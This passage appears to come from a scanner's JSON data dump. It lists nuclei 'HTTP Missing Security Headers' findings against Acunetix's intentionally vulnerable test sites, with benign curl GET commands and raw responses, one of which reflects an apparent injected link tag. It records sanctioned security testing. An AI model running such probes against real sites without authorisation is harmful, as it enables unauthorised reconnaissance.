href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 328, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.740Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 329, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.867Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 330, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:40:51.005Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 331, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:40:51.141Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 332, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:40:51.266Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 333, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:40:51.395Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 334, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:40:51.521Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 335, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:40:51.652Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 336, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:40:51.787Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 